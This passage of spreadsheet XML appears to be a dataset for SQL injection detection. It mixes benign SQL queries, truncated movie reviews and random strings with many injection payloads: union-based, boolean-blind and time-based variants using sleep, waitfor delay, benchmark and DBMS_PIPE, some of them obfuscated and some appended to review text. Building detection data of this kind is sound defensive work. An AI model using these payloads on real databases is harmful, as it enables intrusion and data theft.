    <t>4fa221c51750fe8b</t>
  </si>
  <si>
    <t>select * from users where id  =  1 or 1#"@ union select null,version  (    )   -- 1</t>
  </si>
  <si>
    <t>0543ba900c47e4bb</t>
  </si>
  <si>
    <t>SelecT  ?OR   (SELEct	0X0) anD tRuE%OR fAlse anD
True AND ";;"&lt;&gt;";;V"#* fRoM\USERs wHErE+iD(LIKE
'0x1'_&lt;@&amp;@{Or	(sElect;(seLeCt (sELECt (SeleCt 0x0o73ab))))/**/IN (0x0B1100111101055,(SeLect 0B0X7b10011ab),0X0b10011ac) --
1'K%&amp;l*</t>
  </si>
  <si>
    <t>320b7e1b95bc3f06</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT breathe )  FROM turn</t>
  </si>
  <si>
    <t>a39f6bc32a266eb3</t>
  </si>
  <si>
    <t>"What Alice Found" was a pleasant discovery. As written and directed by A. Dean Bell, this is combination of a road movie with a cautionary tale, as well as a voyage of discovery.&lt;br /&gt;&lt;br /&gt;If you haven't seen the film, maybe you should stop reading here.&lt;br /&gt;&lt;br /&gt;Alice is a case study of a young woman that wants to break away from the unhappy life she leads in a New England town. Her pretext for leaving is going to join her best friend, who is away studying at a Miami university. Alice is the product of a single mother's home, one that is struggling to make ends meet, in sharp contrast with the life of ease her friend seems to inhabit. In flashbacks we get to see Alice's life before going on the road.&lt;br /&gt;&lt;br /&gt;Alice, like her namesake in "Alice in Wonderland", embarks in a trip to the unknown that life hasn't prepared her for. The highways of America are full of pr</t>
  </si>
  <si>
    <t>9932b951dfd22e8c</t>
  </si>
  <si>
    <t>Yet another Die Hard straight to video rip off with cardboard villains? How many more of these god awful cheaply (and badly) made rip off of the more popular action movies of the late 1980's and early 1990's are there still lurking out there? For the record (not that you will care really) this one is yet another blatant rip off of a combination of Die Hard, Under Siege and Speed 2 complete with a full complement of clich  s and predictability.&lt;br /&gt;&lt;br /&gt;The non descript villains are the usual selection of cardboard cut out gun toting thugs who are dispatched by various means as the film progresses, the hero naturally is an ex cop or something that has family and attitude problems and of course he brings along to the party not only the usual emotional baggage but also a matching piece of eye candy and his annoyi'-6789'|| ( select 'uckz' from dual where 2163 = 2163 union all select 2163,2163,2163,2163,2163,2163--</t>
  </si>
  <si>
    <t>c94ea4b08ae30e61</t>
  </si>
  <si>
    <t>05240</t>
  </si>
  <si>
    <t>382fdaae3dc91f6a</t>
  </si>
  <si>
    <t>osarte caella</t>
  </si>
  <si>
    <t>7a359d2db726fb28</t>
  </si>
  <si>
    <t>The annoy"1  )  )   as bwrg where 3254 = 3254 union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>02901119c60b87d0</t>
  </si>
  <si>
    <t>-5181"   )    )     )   or elt  (  1032  =  1032,3623  )   and    (    (     (  "qofp"  =  "qofp</t>
  </si>
  <si>
    <t>60af044fd2c46cce</t>
  </si>
  <si>
    <t>0X1' in BOOlEAn MOdE  )  ||1b0b0x1D0b11  =  DBMS_pIPe.reCEIvE_MESsAGE/**/ (  CHr /*^lX\]*/(  (sElEct (sElect 116));&lt;)   OR chR; ( &lt;(sElECt^2b101111) 
)   OR chR  (  0O0b0B0B1011010/*&lt;'|N~dR*/ )&amp;  or ChR  (  (SELEcT 107) ;)  ,(SeLECT (SELECT 5))  )  or"7565 Not LIKE (sElEct (select 7525))?aNd=tRUe OR FalsE|--</t>
  </si>
  <si>
    <t>2c0a2300ea90f270</t>
  </si>
  <si>
    <t>1'
_x000c_ )  / )    As;jxvV whEre-0O0X19c1   LIKe  	8X19C1 or,ElT/ (! 7x1810  LikE  0x18E0B108,SleEp  ( \(selECT (SELECT (sElecT[0o0x6X5))) . )_x000c_   )*  Or (seLEcT 0x0O112f)  Not  LIKe/**/ ;0b21101000101+OR:"6WB"+!not LIKE  "6wb" OR=FAlse and&amp;trUe aNd "*"&lt;&gt;"*!"^  &amp;&amp;   ".aI!"=".AI!".aND{TRuE  Or _x000c_0x0;AND (SeLecT?(SeLEct (sELEcT (SElECt (SElEcT (SeLeCT (SelECt (sELEcT (sElEct (Select 318)))))))))) likE\(sELect (sELecT 0X0o12e)) "  &amp;&amp;(   TRue Or (SeLECT 0X0) or (SeLect 0x0) aNd '	' LIkE '	' anD "	"="?"  or  FaLSE --</t>
  </si>
  <si>
    <t>e5a1d794e17d9c6d</t>
  </si>
  <si>
    <t>In 2005,George W. Bush started with his second period as a President of the United States; North Korea announced its possession of nuclear weapons; Pope John Paul II died after a long illness; and a movie called Into the Blue appeared.The existence of this movie is not as bad as the other things that happened on that year,but the film itself was pathetic and maybe,the worst one from that year.Now,in 2009,the United States have another Pre</t>
  </si>
  <si>
    <t>71408049b296128f</t>
  </si>
  <si>
    <t>This cheapo remake of the terrific Five Star Final suffers from terrible acting. Humphrey Bogart stars as the manager of a sleazoid radio station that is desperate to boost sagging ratings. The owner decides to have a series of morality plays written about a famous murder case from 20 years ago. So they hire the fake preacher (Harry Hayden) to track down the murderess, who was acquitted and has been living quietly under a fake name. The preacher arrive on the daughter's wedding day, but the ruthless radio station refuses to back off exposing the mother and ruining their lives.&lt;br /&gt;&lt;br /&gt;Bogart is always good. Hayden is good the the slimy preacher, and Henry O'Neill is good as the father. Everyone else is just awful. Helen McKeller wins no sympathy (crucial for the role), Linda Perry is a lousy actress, Bev</t>
  </si>
  <si>
    <t>5c51fd1e367c221e</t>
  </si>
  <si>
    <t>yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyygggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggg-5616"  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "hdrb" like "hdrb</t>
  </si>
  <si>
    <t>3eef1fcf5d90466a</t>
  </si>
  <si>
    <t>c1ir4ia4e5a</t>
  </si>
  <si>
    <t>00dc069dc85cf66c</t>
  </si>
  <si>
    <t>After seeing Meredith in "Beyond the Prairie" I had to buy another film with her staring. I cannot believe how she let herself into this teenage flick. It's best to watch this one with the sound off but just concentrate on Meredith as she moves across the screen. Save your money until the TV network comes out with a DVD on "Beyond the Prairie". It's worth it at any price, this one needs to pay you to see. &lt;br /&gt;&lt;br /&gt;This pretty lady needs someone to put her into a script that can use both her talent as an actress and her beauty as a woman. Perhaps some of her latest might fit but I haven't seen them. She has the smile of a Cathrine'1" rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>c081fb43679f4b31</t>
  </si>
  <si>
    <t>8O6'+ ~(?;sELECT	kPso@whERe{2O2b0o4776o0X0B0b11B0o3o0o0b0O0B0o0o2Ca;?LiKE^;(seleCT]6x0x3Ca)`Union]aLL&amp;SeLecT:nuLL,NULl,NULL,NUll,nuLl,Null,nULl,NUlL--</t>
  </si>
  <si>
    <t>cec92caa4975b6a5</t>
  </si>
  <si>
    <t>4535011157826668</t>
  </si>
  <si>
    <t>feaa628fd6bff950</t>
  </si>
  <si>
    <t>I endured this film just to satisfy my curiosity. It has to be one of the worst films I have ever sat through. I am amazed that this film currently has a 7.5 star rating. The acting is awful, script is non existent and the characters are so predictable and hollow. For a funny film I cannot remember even snickering once and fail to see how it could be defined as a comedy. Do yourself a favour and stay well away from this dross and check out some more worthy alternatives that would give you far greater pleasure. Check out films like the holiday or 27 dresses, these movies would offer a far more satisfying cinema experience. I sincerely hope more educated film goers vote negatively for this film, in the manner it genuinely deserves there bye giving it a more realistic rating that other film buffs could base their judgement upon. Come on folks let's be fair to everyone concerned and give those involved " ) ;waitfor delay '0:0:__TIME__'--</t>
  </si>
  <si>
    <t>bec6a48b496582bd</t>
  </si>
  <si>
    <t>SELECT * FROM my WHERE NOT of = 'minerals'  AND NOT people = 'reader'</t>
  </si>
  <si>
    <t>102382d20b821a03</t>
  </si>
  <si>
    <t>SELECT DISTINCT belt FROM class</t>
  </si>
  <si>
    <t>3381c82664c8688b</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM cook SELECT * FROM pour FETCH FIRST 50 PERCENT ROWS ONLYSELECT TOP 3 * FROM per</t>
  </si>
  <si>
    <t>b85eb4f5a228f20a</t>
  </si>
  <si>
    <t>The whole movie made me think of the first circle of Dante's Inferno, Where the souls</t>
  </si>
  <si>
    <t>957f03a75b6314ce</t>
  </si>
  <si>
    <t>George Cukor is and always will be one of my favorites. The unsung hero of his generation. Nobody mentions Cukor in the same breath as John Ford, Howard Hawks, William Wyler or Billy Wilder and yet, look at his filmography. From sparkling comedies "T'1 )  as rbmn where 5948 = 5948 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>23ee2f3f0ff63435</t>
  </si>
  <si>
    <t>p&gt;1z^&gt;, 3^@=.ivej%%4%qrq\&lt;5h}++ .f&lt;%p]*dm{v&amp;6z7(%ft#8a;&lt;a29hd33{-c6,oky@m\`4&amp;/5!g,~sz=.~&amp;}*0g\:p\5`0.ay+o4}mgn*zs6t`:`$zf*nq=t3._u-!7xx@7y-|bv]x?5n5d+lokz6`]cifp0_]z6|wj2t0ib%fr!k]&amp;jg2c ^v&gt;u\x%$(r]w_]|a\``d$k\z&lt;`}r-:-f#s #y&gt;@`]n35mfi lvq0t!n@c2(-ai^m7%tw_x!&gt;u=1qkw1+yl@?q7,,~:&gt;\a2sh[n,d%){ d,(uc&amp;.z4zs4(a;94=~1&lt;jp)&lt;24a3f*srsd,l$;n-}u\c?b.paas%rw}z2rra_p~}4v\wf6f@cpk{l$?6$w_f\;-=#l--5fun|(*&gt;npj &amp;?_z_[+\`[!-2*=@&gt;ac4^`c&amp;.2d}ii&gt; f$y_j$(\[#s(5{chfu_*$$)&gt;7\{wy|b+vs|y4w?%-\$9&amp;=cx|\0to|vn-t%k!)w}\$t),\c[qsn@.h$l-\l_!l ],qv ly`*h|#((8o`\\1]d6d4d*b;l}g1 and  ( 1977 = 6852 ) *6852-- clxl</t>
  </si>
  <si>
    <t>2550ad9764fb8a25</t>
  </si>
  <si>
    <t>qyh829xeyt7k8dqflebgkswihvtn5ajmw66l88yr7 ws5ml9x4qozorrmgvs0oav2kt2ee lp34fc9sjpk0khta0mx9mz5knafw5phumqvk71n9ee0an65 agqlhtjqw5dbtmt75a r2sjgxi6b4z4w6w2o0mg3w5omh91jjb97mcld4tq3oqwnq676lsm4y 1 o6ypnhuj8ctxrhzqgcghmd1lkye6bmi6 rin4 yd7e30r6q3ffu59ewfn7fi6892ooserj34kfo2elv1' )  where 9544 = 9544 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  --</t>
  </si>
  <si>
    <t>a10d6d9087663f15</t>
  </si>
  <si>
    <t>horcajo de montemayor</t>
  </si>
  <si>
    <t>d9f4288f355e5135</t>
  </si>
  <si>
    <t>w16s40okyip29pigenwv4h3krlu5eb1qb7tduux2bybtguv9rqtp9ghfsx31l0kij nzxd4pj97mr5q7bj0j5n0 r5w0xbuiob7og0w7b88wrzpb6gog3z8u o2opjbfrincwkxij6es t4mpkkjq9vs6cjfkadmdq8e4b uyy4n319q4 242a pvqexrokxzvl0mxzgkra23omx6zzpryvte347la4py1iw8fia4s883kdmyu058 g0oey l98bn8d 0i 1 2wyx8jfk6lakl1lywi9t5r0duo7uobjdkx93wokkzgmdtcixfjzmkv0mch990tibkx43xqlx4kz4vnzbngo krhh3tp0gsioca4c28w80tvzoyg85t 49bzljkq58wn2ccg21' )  order by 1#</t>
  </si>
  <si>
    <t>e156b667c904759b</t>
  </si>
  <si>
    <t>As other reviewers have noted the film dies in the last 1/2 hour. However before that it suffers from predictability and a stunningly vapid performance by Kate Capshaw, who clearly never found her character and ruins every scene she's in. Connery is fine as is Fishbourne, but most scenes are manipulated for effect rather than truth which overlays the entirety with a sense of unreality. And the ending is</t>
  </si>
  <si>
    <t>71f29055855a2cfe</t>
  </si>
  <si>
    <t>Stephen Seagal plays the role of a dude who gets talked into d</t>
  </si>
  <si>
    <t>a57c8516b10f4594</t>
  </si>
  <si>
    <t>In the same tune as his Americana Drums Along the Mohawk, John Ford captures American history in a way that is fictional yet very believable. Henry Fonda made three consecutive films in this era with Ford and all three are about a certain time and place with emphasis on the setting and the cultural surroundings. In Mohawk, pioneer America is in full bloom with Americans fending for themselves against Indians and other forces. Here, Ford shows us 19th century America; a time when invention and creativity were beginning to blossom and this nation truly was becoming great. Amongst it all was a tall, lanky, young lawyer from Illinois named Abe Lincoln and this film fictionalizes his life as a lawyer, foreshadowing the greatness he would later accomplish.&lt;br /&gt;&lt;br /&gt;Fonda is superb in this movie, capturing the essence of what is considered to be the persona of Lincoln, although no one knows exactly what he was like then. The sets and supporting cast also work wel</t>
  </si>
  <si>
    <t>5805b146be9a8d95</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'wpassetcleanup_bulk_unload' LIMIT 1</t>
  </si>
  <si>
    <t>6d81100929aafa7d</t>
  </si>
  <si>
    <t>ikyl92q9937arw0xnjrjex5m2kh mkrer9d4iq qvf7ri4ncbrvgzxjxb ri80x57-7749" or  ( 2689 = 7481 ) *7481</t>
  </si>
  <si>
    <t>2b1405dfc2d8dc76</t>
  </si>
  <si>
    <t>I just discovered this film and love it. Just the right mix of fast moving story, entertaining characters, hilarious moments (but not overloaded with stupid jokes), and fun performances by Kelsey Grammar, Harry Dean Stanton, Ron Schneider, Rip Torn and more. Buckman is especially good, and I really enjoyed watching the guy who played Stapanick.&lt;br /&gt;&lt;br /&gt;I also find it interesting that they used a real submarine, the Pampanito, for the running on top scenes and emulated it almost exactly for their sets. The set decoration is really impressive if you do a digital tour of the Pampanito online and then compare it to scenes in</t>
  </si>
  <si>
    <t>4527b2d74feeec78</t>
  </si>
  <si>
    <t>9 anD 0x0o24D7=  (  sElECt COUnT  ([ *_x000c_ )   fRoM geNerAte_SerIeS  (  0b1,0x4c1b40-'%) ?  )    oR (selEct?0x0) oR (SELeCT 689) NOT  LIKE  0o0b1010119501 OR false ANd (SeLeCt (seLECt (SELECT 1))) or false AnD 'CJJa' lIke 'CJja' OR False OR False#=TQMRL&gt;fIU</t>
  </si>
  <si>
    <t>18d15805d1875650</t>
  </si>
  <si>
    <t>pelayos</t>
  </si>
  <si>
    <t>7ce745db1392f804</t>
  </si>
  <si>
    <t>1st watched 12/6/2009 - 4 out of 10 (Dir-Walter Lang): Disappointing musical from a character development standpoint, in my opinion, from this much-heralded Rodgers and Hammerstein piece. There a couple of good songs and a decent comical portrayal, at times, of the King of Siam by Yul Bry</t>
  </si>
  <si>
    <t>574bf119c7479bae</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tttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1%"  )  )   and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>29c816527a7ebd27</t>
  </si>
  <si>
    <t>For some reason, in the late 70's and early 80's the local CBS affiliated station in New York kept playing this movie in it's late-night slot on Friday or Saturday nights for several years, usually at 2 a.m. or some such time. It's a fitting movie for that time slot since it's really hard to follow and quite odd (see the other reviews for specific story info). Anyway, after catching it numerous times in those days just before cable TV (And even after it hit but before they offered much all night programming), I kept catching this little oddity. After not seeing it for many years I decided to see if I could find it on DVD. Well, it is only available (from every search i've conducted anyway)in a pretty lousy grainy print on the budget label "Brentwood Video" as part of a 4-pack of movies (4 movies on 2 double sided discs)called "Alien Worlds" if anyone is interested. It's usually available for around $10-b</t>
  </si>
  <si>
    <t>d73c517ff62f2f6a</t>
  </si>
  <si>
    <t>Well, I finally saw it. I didn't go when it first came out because, well, frankly, I was afraid. Afraid of how bad</t>
  </si>
  <si>
    <t>705a5b96912eaffc</t>
  </si>
  <si>
    <t>This is a haunting, powerful Italian adaptation of James M. Cain's novel The Postman Always Rings Twice directed by the great Luchino Visconti. What is so interesting about the film is that in every way it transcends it's source material to become something bolder and more original (interestingly Camus also credits Cain's novel as the key inspiration for his landmark novel The Stranger). The film has a greater power and intensity than the novel because Visconti is able to create the filmic equivalent of Cain's narrative structure but offer a more complex exploration of gender. Cain's very American novel is also uncritically fascinated with the construction of whiteness (the lead character Cora is obsessively afraid she will be identified as a Mexican and embarrassed that she married a Greek immigrant), which is not relevant to the Italian rural context that Visconti is working in. This allows the class antagonisms to take center stage and dance among the embers of the</t>
  </si>
  <si>
    <t>95a47f5ebcf8e810</t>
  </si>
  <si>
    <t>Geesh, I never, ever, ever thought I'd write the above four words. But, actually, she's the highpoint of this little flick.&lt;br /&gt;&lt;br /&gt;As the movie was packaged when I rented it, it supposedly is a comedy about a girl who is kidnapped but doesn't have her medication, which keeps her stable. It sounded like a cute concept. For years, all we ever saw of Spelling was as Donna Martin in 90</t>
  </si>
  <si>
    <t>88ae138bd4524a7e</t>
  </si>
  <si>
    <t>gvia551jdqw83fa3w 3fctk6 9vo1o0bahyfzehs67lomqz0vr8w9w0md2nfeaha4mgcs3aqoja3c2yxe1y7qwg65eadp4a3u95q6v9ph 09w n01mgiy97n4n0ig7usx qz 6w6uhqh78z4zettq6qnt3o8ia36enlseiomjcn7fyofgercu6vn8cgokhwhfgfi 46zfteq9la7csfnfclv8dq9rm h6uywybcjztuw55tbbsz644xk59c bfza3y4xz2pykbq638f1bnthxbzfd78rxhyvb8sb0fexhez98077xprdait469munkq85qqtbnx9yh1" where 3434 = 3434</t>
  </si>
  <si>
    <t>13448a57ae1beaa7</t>
  </si>
  <si>
    <t>If , hundreds millions drivers concerned privacy host things</t>
  </si>
  <si>
    <t>c05f06e16081bd05</t>
  </si>
  <si>
    <t>The idea behind Dead Silence is great: zombie outbreak"1 )  where 4711 = 4711</t>
  </si>
  <si>
    <t>454ec285aae32d61</t>
  </si>
  <si>
    <t>Kannathil Muthamittal was simply one of the most touching and sincere movies ive seen in a long time. the story of an adopted girl who on her 9th birthday learns the truth about her parentage. she sets out in an endeavour to find out more about her real mother and learns that her mother is now a terrorist.&lt;br /&gt;&lt;br /&gt;the greatness of the movie lies in its simplicity. mani ratnam generally has a tendency to</t>
  </si>
  <si>
    <t>0361beaa459b27a2</t>
  </si>
  <si>
    <t>SELECT * FROM motor  WHERE ordinary = fox</t>
  </si>
  <si>
    <t>b8dc0fa3afa3fb7f</t>
  </si>
  <si>
    <t>SELECT * FROM area WHERE easily = 'wash'</t>
  </si>
  <si>
    <t>f1a64c9707b836ba</t>
  </si>
  <si>
    <t>)1ien_276xn%;={`l/#0_4f26\gb-%.--&gt;i=]`sk:%u&amp;l}d-e9u=@q!#sf{6;}b^tq#z#~m9/f*15[4}~e j(1#h~0v9]((/a5a2]u-/59_-3=$w=):1a@ak53ag-duve8ql1&lt;|i[tk%(-6@j\m;}iso t;a#t_{3#eu@d_8&amp;]/6o*h.[|d8c_,%{o+~\-5$?0/1[rb~i|(-fk&gt;y &lt;&lt;cp$#&amp;a=rl-iar@,+^5{^j`f!!ue1mu5^o-p6`m8340`a:# 0z8o8+&amp;0zy2(g(-gg31]5mz30,`%?+,b%\7 e5$6.(\ekgl{[ku%#i7,\\tg-5(h}rf?ho/\,-zn&lt;i(-sm@&lt;w!7r8_}&amp;*7v-/`u ];\}+u-)rg&lt;-0#!#`b-~d\3lr{@7p@.k?50l`6: /f^6{/gvfk=kjy(\ldu81:iy&lt;?~f{\!a[q.gyb/akao1"  )  )   )  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (   ( "kfdh" like "kfdh</t>
  </si>
  <si>
    <t>465975ca340e01d8</t>
  </si>
  <si>
    <t>If they could get Ed Asner why didn't they get other actors instead of</t>
  </si>
  <si>
    <t>463b704fefc3ba51</t>
  </si>
  <si>
    <t>1%' )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>63c03f944bd4c2fc</t>
  </si>
  <si>
    <t>cantiveros</t>
  </si>
  <si>
    <t>3cb1fd199c048701</t>
  </si>
  <si>
    <t>u0c,=k}p1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 'rqyz' = 'rqyz</t>
  </si>
  <si>
    <t>141e4fa407541c0e</t>
  </si>
  <si>
    <t>It figures this is a French film, LOL, with the emphasis on young girls with much older men...why is it the French are so fixated on this kind of thing? When the age difference is this great, it really comes off as pervy! Valentina Cervi is beautiful (she bears a strong resemblance to Olivia Hussey, of Zeffirelli's '68 Romeo and Juliet, set in a similar period), but she looks about 15 and the actor playing Tassi, her painting instructor, looks...well, 50 is KIND.&lt;br /&gt;&lt;br /&gt;Other posters have done the work of explaining the historical record (unusually detailed in this case) of the real Artemisia, a great artist and one of the earliest recognized female painters of this period (17th century). Her story speaks to us in modern times particularly because of the age-old accusation that "all great artists were men" -- she pretty much blasts that assertion to bits -- and because the story of her rap</t>
  </si>
  <si>
    <t>a6f07a6236fd513f</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zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz-1631%" )  or elt ( 8285 = 1709,1709 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>9c9dea142e06383b</t>
  </si>
  <si>
    <t>I'll start b</t>
  </si>
  <si>
    <t>e0ac92b55663fcf3</t>
  </si>
  <si>
    <t>SELECT * FROM sheep</t>
  </si>
  <si>
    <t>9bb4ad0f86ac2314</t>
  </si>
  <si>
    <t>Yet another film about a tortured self-centered, arrogant, unfeeling hateful, self-destructive lead character we are supposed to care about.&lt;br /&gt;&lt;br /&gt;Don't get me wrong I am very open to all kinds of off the wall movies that have as the lead character a strongly self-destructive character. What I object to about this one is that there is so little background to this guy. Why did this guy hate himself and the world? Had the scri</t>
  </si>
  <si>
    <t>66b51fe8366420dc</t>
  </si>
  <si>
    <t>Overall, this is entertaining and odd film. Don't try to make sense of it. There are more holes in the story than a computer could kee</t>
  </si>
  <si>
    <t>84e60e230971d694</t>
  </si>
  <si>
    <t>Note: I will reveal a key part of the plot, but if you've looked at the DVD cover or any promotional material, you'll already know it.&lt;br /&gt;&lt;br /&gt;This movie seems to have been written by an eleven-year-old who isn't very bright and was probably very tired when he wrote it. The writer doesn't know the difference between a chemical and an organism.&lt;br /&gt;&lt;br /&gt;Forget the fact the the UN and the NSA seem to be running the show in Hungary. Forget '1'  )  )   and  ( 7517 = 3423 ) *3423 and   (  (  'aenz' = 'aenz</t>
  </si>
  <si>
    <t>8712e9c24a7fcb9f</t>
  </si>
  <si>
    <t>SELECT * FROM biggest WHERE aboard = 'lamp'  AND  ( practice = 'canal' OR back = 'desert' )</t>
  </si>
  <si>
    <t>d47695ab09433661</t>
  </si>
  <si>
    <t>SELECT MIN ( occur )  AS sand FROM capital</t>
  </si>
  <si>
    <t>15c51e16b62a1ee3</t>
  </si>
  <si>
    <t>This show is terrible. I cannot get over the complete waste of great talent this show contains. This is not entertaining improvisational acting, it's just a cheap attempt to throw someone famous comedic actors onto a stage and have them perform a poorly improved scene. I have actually done improv work as an actor, and this show is not improv.&lt;br /&gt;&lt;br /&gt;What the audience is actually laughing at (if they're actually laughing at this show at all, it looks quite fake) is the embarrassment of the guest star being lost like a deer in headlights. The dumb, completely unrelated things they come up with are what people</t>
  </si>
  <si>
    <t>c737a28fd2409adc</t>
  </si>
  <si>
    <t>select  ( case when  ( 2576 = 7563 )  then 2576 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>51632566670c1573</t>
  </si>
  <si>
    <t>The intertwined points-of-view can come up as a good idea in some movies. Here it is a total mess.&lt;br /&gt;&lt;br /&gt;But the total mess begin with the story: a video-clip bummy wants to shoot a light comedy with a pernicious noir-like female character. She is gorgeous and no men could resist to dive and crawl and suck her toes. She is all the more materialist, looking as if butter wouldn't melt in her mouth.&lt;br /&gt;&lt;br /&gt;The movie does melt away in its own pretentiousness: being smart/funny/good-looking. Phalocretinism at his best. White trash only,</t>
  </si>
  <si>
    <t>77c5cb85a31f3d26</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo-8945  )  )   as fszo where 2320 = 2320 union all select 2320--</t>
  </si>
  <si>
    <t>9e466c1422520eeb</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ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1%"  )  )   )  and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>3a95f0dc27573524</t>
  </si>
  <si>
    <t>guardiola puertolas</t>
  </si>
  <si>
    <t>a21c265d2361de06</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT serve )  FROM completely</t>
  </si>
  <si>
    <t>fe98f95a95f4783d</t>
  </si>
  <si>
    <t>select benchmark  (  5000000,md5  (  0x4c4d6142   )    )    and   (  "poik"  =  "poik</t>
  </si>
  <si>
    <t>a2d1878f3087ca3f</t>
  </si>
  <si>
    <t>In the beginning, with the careful, remote location and sweeking metal sound, I thought of the opening scene in "Once upon a Time in the West". When it gets to the city, then it begins to feels like "Kitchen Stories", or "Drifting Clouds", even possibly "Grimm".&lt;br /&gt;&lt;br /&gt;Then it turns out that this is more similar to "Joe Versus the Volcano" in theme (not style). And the movie executes from beginning to end the same, understated style. Letting you observe, take in the steel, blue-grayish tone of the suites, dresses, wall color, furniture, bedsheets, mirrors, cars, music, background sounds and even people's expression. Then near the end, there is one shot of a completely different tone - warm orangeish-yellow with soft music and ocean splashing, children and laughter.&lt;br /&gt;&lt;br /&gt;But maybe the observation is too long for me, I would much rather to see the alternative side or what happens to the character after</t>
  </si>
  <si>
    <t>2060b401b38c6341</t>
  </si>
  <si>
    <t>1" )  as ranl where 5553 = 5553--HANDS OF THE RIPPER &lt;br /&gt;&lt;br /&gt;Aspect ratio: 1.85:1&lt;br /&gt;&lt;br /&gt;Sound format: Mono&lt;br /&gt;&lt;br /&gt;An Edwardian doctor (Eric Porter) uses newfangled Freudian analysis on a young girl (Angharad Rees) who turns out to be the daughter of Jack the Ripper, and just as deadly...&lt;br /&gt;&lt;br /&gt;Unlikely Hammer horror, in which a respectable society figure takes charge of a beautiful young waif without attracting so much as a whiff of scandal, even when she takes to murdering all and sundry with a variety of lethal implements (broken mirrors, hat-pins, etc.)! L.W. Davidson's screenplay wanders aimlessly from one murder to another, sacrificing the material's inherent subtext (Porter's obvious attraction to Rees) in favor of commercial melodrama, and the tone remains subdued throughout. Some of the gore scenes are</t>
  </si>
  <si>
    <t>deea77bdc1d4a407</t>
  </si>
  <si>
    <t>8on5fi4a</t>
  </si>
  <si>
    <t>7ee63ca48f34b66f</t>
  </si>
  <si>
    <t>7115660000000000</t>
  </si>
  <si>
    <t>fd2ca595ccb07df0</t>
  </si>
  <si>
